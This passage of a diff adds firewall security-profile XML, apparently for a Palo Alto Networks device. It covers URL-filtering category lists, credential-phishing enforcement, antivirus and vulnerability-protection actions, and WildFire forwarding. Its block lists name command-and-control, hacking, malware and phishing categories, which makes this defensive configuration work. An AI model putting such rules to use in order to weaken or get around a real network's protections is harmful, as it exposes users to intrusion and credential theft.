+                    <member>web-advertisements</member>
+                    <member>web-based-email</member>
+                    <member>web-hosting</member>
+                    <member>Black-List</member>
+                    <member>White-List</member>
+                  </block>
+                </credential-enforcement>
+                <log-http-hdr-user-agent>yes</log-http-hdr-user-agent>
+                <log-http-hdr-referer>yes</log-http-hdr-referer>
+                <log-http-hdr-xff>yes</log-http-hdr-xff>
+                <action>block</action>
+                <alert>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>sports</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                  <member>White-List</member>
+                </alert>
+                <block>
+                  <member>command-and-control</member>
+                  <member>hacking</member>
+                  <member>malware</member>
+                  <member>phishing</member>
+                  <member>Black-List</member>
+                </block>
+              </entry>
+              <entry name="Alert-Only-URL">
+                <credential-enforcement>
+                  <mode>
+                    <ip-user/>
+                  </mode>
+                  <log-severity>medium</log-severity>
+                  <alert>
+                    <member>abortion</member>
+                    <member>abused-drugs</member>
+                    <member>adult</member>
+                    <member>alcohol-and-tobacco</member>
+                    <member>auctions</member>
+                    <member>business-and-economy</member>
+                    <member>computer-and-internet-info</member>
+                    <member>content-delivery-networks</member>
+                    <member>copyright-infringement</member>
+                    <member>dating</member>
+                    <member>dynamic-dns</member>
+                    <member>educational-institutions</member>
+                    <member>entertainment-and-arts</member>
+                    <member>extremism</member>
+                    <member>financial-services</member>
+                    <member>gambling</member>
+                    <member>games</member>
+                    <member>government</member>
+                    <member>hacking</member>
+                    <member>health-and-medicine</member>
+                    <member>home-and-garden</member>
+                    <member>hunting-and-fishing</member>
+                    <member>insufficient-content</member>
+                    <member>internet-communications-and-telephony</member>
+                    <member>internet-portals</member>
+                    <member>job-search</member>
+                    <member>legal</member>
+                    <member>malware</member>
+                    <member>military</member>
+                    <member>motor-vehicles</member>
+                    <member>music</member>
+                    <member>news</member>
+                    <member>not-resolved</member>
+                    <member>nudity</member>
+                    <member>online-storage-and-backup</member>
+                    <member>parked</member>
+                    <member>peer-to-peer</member>
+                    <member>personal-sites-and-blogs</member>
+                    <member>philosophy-and-political-advocacy</member>
+                    <member>phishing</member>
+                    <member>private-ip-addresses</member>
+                    <member>proxy-avoidance-and-anonymizers</member>
+                    <member>questionable</member>
+                    <member>real-estate</member>
+                    <member>recreation-and-hobbies</member>
+                    <member>reference-and-research</member>
+                    <member>religion</member>
+                    <member>search-engines</member>
+                    <member>sex-education</member>
+                    <member>shareware-and-freeware</member>
+                    <member>shopping</member>
+                    <member>social-networking</member>
+                    <member>society</member>
+                    <member>sports</member>
+                    <member>stock-advice-and-tools</member>
+                    <member>streaming-media</member>
+                    <member>swimsuits-and-intimate-apparel</member>
+                    <member>training-and-tools</member>
+                    <member>translation</member>
+                    <member>travel</member>
+                    <member>unknown</member>
+                    <member>weapons</member>
+                    <member>web-advertisements</member>
+                    <member>web-based-email</member>
+                    <member>web-hosting</member>
+                  </alert>
+                </credential-enforcement>
+                <action>block</action>
+                <alert>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>hacking</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>malware</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>phishing</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>sports</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                </alert>
+              </entry>
+              <entry name="Exception-URL">
+                <credential-enforcement>
+                  <mode>
+                    <ip-user/>
+                  </mode>
+                  <log-severity>high</log-severity>
+                  <block>
+                    <member>abortion</member>
+                    <member>abused-drugs</member>
+                    <member>adult</member>
+                    <member>alcohol-and-tobacco</member>
+                    <member>auctions</member>
+                    <member>business-and-economy</member>
+                    <member>command-and-control</member>
+                    <member>computer-and-internet-info</member>
+                    <member>content-delivery-networks</member>
+                    <member>copyright-infringement</member>
+                    <member>dating</member>
+                    <member>dynamic-dns</member>
+                    <member>educational-institutions</member>
+                    <member>entertainment-and-arts</member>
+                    <member>extremism</member>
+                    <member>financial-services</member>
+                    <member>gambling</member>
+                    <member>games</member>
+                    <member>government</member>
+                    <member>hacking</member>
+                    <member>health-and-medicine</member>
+                    <member>home-and-garden</member>
+                    <member>hunting-and-fishing</member>
+                    <member>insufficient-content</member>
+                    <member>internet-communications-and-telephony</member>
+                    <member>internet-portals</member>
+                    <member>job-search</member>
+                    <member>legal</member>
+                    <member>malware</member>
+                    <member>military</member>
+                    <member>motor-vehicles</member>
+                    <member>music</member>
+                    <member>news</member>
+                    <member>not-resolved</member>
+                    <member>nudity</member>
+                    <member>online-storage-and-backup</member>
+                    <member>parked</member>
+                    <member>peer-to-peer</member>
+                    <member>personal-sites-and-blogs</member>
+                    <member>philosophy-and-political-advocacy</member>
+                    <member>phishing</member>
+                    <member>private-ip-addresses</member>
+                    <member>proxy-avoidance-and-anonymizers</member>
+                    <member>questionable</member>
+                    <member>real-estate</member>
+                    <member>recreation-and-hobbies</member>
+                    <member>reference-and-research</member>
+                    <member>religion</member>
+                    <member>search-engines</member>
+                    <member>sex-education</member>
+                    <member>shareware-and-freeware</member>
+                    <member>shopping</member>
+                    <member>social-networking</member>
+                    <member>society</member>
+                    <member>sports</member>
+                    <member>stock-advice-and-tools</member>
+                    <member>streaming-media</member>
+                    <member>swimsuits-and-intimate-apparel</member>
+                    <member>training-and-tools</member>
+                    <member>translation</member>
+                    <member>travel</member>
+                    <member>unknown</member>
+                    <member>weapons</member>
+                    <member>web-advertisements</member>
+                    <member>web-based-email</member>
+                    <member>web-hosting</member>
+                    <member>Black-List</member>
+                  </block>
+                </credential-enforcement>
+                <log-http-hdr-user-agent>yes</log-http-hdr-user-agent>
+                <log-http-hdr-referer>yes</log-http-hdr-referer>
+                <log-http-hdr-xff>yes</log-http-hdr-xff>
+                <action>block</action>
+                <alert>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>sports</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                  <member>White-List</member>
+                </alert>
+                <block>
+                  <member>command-and-control</member>
+                  <member>hacking</member>
+                  <member>malware</member>
+                  <member>phishing</member>
+                  <member>Black-List</member>
+                </block>
+              </entry>
+              <entry name="Cloud-Workloads">
+                <credential-enforcement>
+                  <mode>
+                    <disabled/>
+                  </mode>
+                  <log-severity>medium</log-severity>
+                  <alert>
+                    <member>White-List</member>
+                  </alert>
+                  <block>
+                    <member>abortion</member>
+                    <member>abused-drugs</member>
+                    <member>adult</member>
+                    <member>alcohol-and-tobacco</member>
+                    <member>auctions</member>
+                    <member>business-and-economy</member>
+                    <member>command-and-control</member>
+                    <member>computer-and-internet-info</member>
+                    <member>content-delivery-networks</member>
+                    <member>copyright-infringement</member>
+                    <member>dating</member>
+                    <member>dynamic-dns</member>
+                    <member>educational-institutions</member>
+                    <member>entertainment-and-arts</member>
+                    <member>extremism</member>
+                    <member>financial-services</member>
+                    <member>gambling</member>
+                    <member>games</member>
+                    <member>government</member>
+                    <member>hacking</member>
+                    <member>health-and-medicine</member>
+                    <member>home-and-garden</member>
+                    <member>hunting-and-fishing</member>
+                    <member>insufficient-content</member>
+                    <member>internet-communications-and-telephony</member>
+                    <member>internet-portals</member>
+                    <member>job-search</member>
+                    <member>legal</member>
+                    <member>malware</member>
+                    <member>military</member>
+                    <member>motor-vehicles</member>
+                    <member>music</member>
+                    <member>news</member>
+                    <member>not-resolved</member>
+                    <member>nudity</member>
+                    <member>online-storage-and-backup</member>
+                    <member>parked</member>
+                    <member>peer-to-peer</member>
+                    <member>personal-sites-and-blogs</member>
+                    <member>philosophy-and-political-advocacy</member>
+                    <member>phishing</member>
+                    <member>private-ip-addresses</member>
+                    <member>proxy-avoidance-and-anonymizers</member>
+                    <member>questionable</member>
+                    <member>real-estate</member>
+                    <member>recreation-and-hobbies</member>
+                    <member>reference-and-research</member>
+                    <member>religion</member>
+                    <member>search-engines</member>
+                    <member>sex-education</member>
+                    <member>shareware-and-freeware</member>
+                    <member>shopping</member>
+                    <member>social-networking</member>
+                    <member>society</member>
+                    <member>sports</member>
+                    <member>stock-advice-and-tools</member>
+                    <member>streaming-media</member>
+                    <member>swimsuits-and-intimate-apparel</member>
+                    <member>training-and-tools</member>
+                    <member>translation</member>
+                    <member>travel</member>
+                    <member>unknown</member>
+                    <member>weapons</member>
+                    <member>web-advertisements</member>
+                    <member>web-based-email</member>
+                    <member>web-hosting</member>
+                    <member>Black-List</member>
+                    <member>Custom-No-Decrypt</member>
+                  </block>
+                </credential-enforcement>
+                <action>block</action>
+                <log-http-hdr-xff>yes</log-http-hdr-xff>
+                <log-http-hdr-user-agent>yes</log-http-hdr-user-agent>
+                <log-http-hdr-referer>yes</log-http-hdr-referer>
+                <log-container-page-only>no</log-container-page-only>
+                <alert>
+                  <member>White-List</member>
+                </alert>
+                <block>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>command-and-control</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>hacking</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>malware</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>phishing</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>sports</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                  <member>Black-List</member>
+                  <member>Custom-No-Decrypt</member>
+                </block>
+              </entry>
+              <entry name="Cloud-AlertAll">
+                <credential-enforcement>
+                  <mode>
+                    <disabled/>
+                  </mode>
+                  <log-severity>medium</log-severity>
+                  <allow>
+                    <member>Black-List</member>
+                    <member>Custom-No-Decrypt</member>
+                    <member>White-List</member>
+                  </allow>
+                </credential-enforcement>
+                <action>block</action>
+                <log-http-hdr-xff>yes</log-http-hdr-xff>
+                <log-http-hdr-user-agent>yes</log-http-hdr-user-agent>
+                <log-http-hdr-referer>yes</log-http-hdr-referer>
+                <log-container-page-only>no</log-container-page-only>
+                <alert>
+                  <member>abortion</member>
+                  <member>abused-drugs</member>
+                  <member>adult</member>
+                  <member>alcohol-and-tobacco</member>
+                  <member>auctions</member>
+                  <member>business-and-economy</member>
+                  <member>command-and-control</member>
+                  <member>computer-and-internet-info</member>
+                  <member>content-delivery-networks</member>
+                  <member>copyright-infringement</member>
+                  <member>dating</member>
+                  <member>dynamic-dns</member>
+                  <member>educational-institutions</member>
+                  <member>entertainment-and-arts</member>
+                  <member>extremism</member>
+                  <member>financial-services</member>
+                  <member>gambling</member>
+                  <member>games</member>
+                  <member>government</member>
+                  <member>hacking</member>
+                  <member>health-and-medicine</member>
+                  <member>home-and-garden</member>
+                  <member>hunting-and-fishing</member>
+                  <member>insufficient-content</member>
+                  <member>internet-communications-and-telephony</member>
+                  <member>internet-portals</member>
+                  <member>job-search</member>
+                  <member>legal</member>
+                  <member>malware</member>
+                  <member>military</member>
+                  <member>motor-vehicles</member>
+                  <member>music</member>
+                  <member>news</member>
+                  <member>not-resolved</member>
+                  <member>nudity</member>
+                  <member>online-storage-and-backup</member>
+                  <member>parked</member>
+                  <member>peer-to-peer</member>
+                  <member>personal-sites-and-blogs</member>
+                  <member>philosophy-and-political-advocacy</member>
+                  <member>phishing</member>
+                  <member>private-ip-addresses</member>
+                  <member>proxy-avoidance-and-anonymizers</member>
+                  <member>questionable</member>
+                  <member>real-estate</member>
+                  <member>recreation-and-hobbies</member>
+                  <member>reference-and-research</member>
+                  <member>religion</member>
+                  <member>search-engines</member>
+                  <member>sex-education</member>
+                  <member>shareware-and-freeware</member>
+                  <member>shopping</member>
+                  <member>social-networking</member>
+                  <member>society</member>
+                  <member>stock-advice-and-tools</member>
+                  <member>streaming-media</member>
+                  <member>swimsuits-and-intimate-apparel</member>
+                  <member>training-and-tools</member>
+                  <member>translation</member>
+                  <member>travel</member>
+                  <member>unknown</member>
+                  <member>weapons</member>
+                  <member>web-advertisements</member>
+                  <member>web-based-email</member>
+                  <member>web-hosting</member>
+                  <member>Black-List</member>
+                  <member>Custom-No-Decrypt</member>
+                  <member>White-List</member>
+                </alert>
+              </entry>
+            </url-filtering>
+            <virus>
+              <entry name="Alert-Only-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>alert</action>
+                    <wildfire-action>alert</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>alert</action>
+                    <wildfire-action>alert</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>default</action>
+                    <wildfire-action>default</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>default</action>
+                    <wildfire-action>default</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>alert</action>
+                    <wildfire-action>alert</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>default</action>
+                    <wildfire-action>default</wildfire-action>
+                  </entry>
+                </decoder>
+              </entry>
+              <entry name="Outbound-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                </decoder>
+              </entry>
+              <entry name="Inbound-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                </decoder>
+              </entry>
+              <entry name="Internal-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>default</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                </decoder>
+              </entry>
+              <entry name="Exception-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>default</action>
+                    <wildfire-action>default</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>default</action>
+                    <wildfire-action>default</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>default</action>
+                    <wildfire-action>default</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                </decoder>
+                <description>Use this profile for rules needing modifications to the standard</description>
+              </entry>
+              <entry name="Cloud-Recommended">
+                <decoder>
+                  <entry name="ftp">
+                    <action>drop</action>
+                    <wildfire-action>drop</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>drop</action>
+                    <wildfire-action>drop</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>drop</action>
+                    <wildfire-action>drop</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>drop</action>
+                    <wildfire-action>drop</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>drop</action>
+                    <wildfire-action>drop</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>drop</action>
+                    <wildfire-action>drop</wildfire-action>
+                  </entry>
+                </decoder>
+                <packet-capture>yes</packet-capture>
+              </entry>
+            </virus>
+            <vulnerability>
+              <entry name="Outbound-VP">
+                <rules>
+                  <entry name="Block-Critical-High-Medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                      <member>high</member>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Inbound-VP">
+                <rules>
+                  <entry name="Block-Critical-High-Medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                      <member>high</member>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Internal-VP">
+                <rules>
+                  <entry name="Block-Critical-High">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                      <member>high</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Medium-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Alert-Only-VP">
+                <rules>
+                  <entry name="Alert-All">
+                    <action>
+                      <alert/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>any</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Exception-VP"/>
+              <entry name="Cloud-Recommended">
+                <rules>
+                  <entry name="Drop">
+                    <action>
+                      <drop/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                      <member>high</member>
+                      <member>medium</member>
+                      <member>low</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Internal-Alert">
+                    <action>
+                      <alert/>
+                    </action>
+                    <vendor-id>
+                      <member>Internal</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                  <entry name="Alert">
+                    <action>
+                      <default/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>informational</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <threat-name>any</threat-name>
+                    <host>any</host>
+                    <category>any</category>
+                    <packet-capture>extended-capture</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+            </vulnerability>
+            <wildfire-analysis>
+              <entry name="Outbound-WF">
+                <rules>
+                  <entry name="Forward-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Inbound-WF">
+                <rules>
+                  <entry name="Forward-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Internal-WF">
+                <rules>
+                  <entry name="Forward-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Alert-Only-WF">
+                <rules>
+                  <entry name="Forward-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Cloud-Recommended">
+                <rules>
+                  <entry name="Analyze-All">
+                    <application>
+                      <member>any</member>
+                    </application>
+                    <file-type>
+                      <member>any</member>
+                    </file-type>
+                    <direction>both</direction>
+                    <analysis>public-cloud</analysis>
+                  </entry>
+                </rules>
+              </entry>
+            </wildfire-analysis>
+          </profiles>
+          <profile-group>
+            <entry name="Outbound">
+              <virus>
+                <member>Outbound-AV</member>
+              </virus>
+              <spyware>
+                <member>Outbound-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Outbound-VP</member>
+              </vulnerability>
+              <url-filtering>
+                <member>Outbound-URL</member>
+              </url-filtering>
+              <file-blocking>
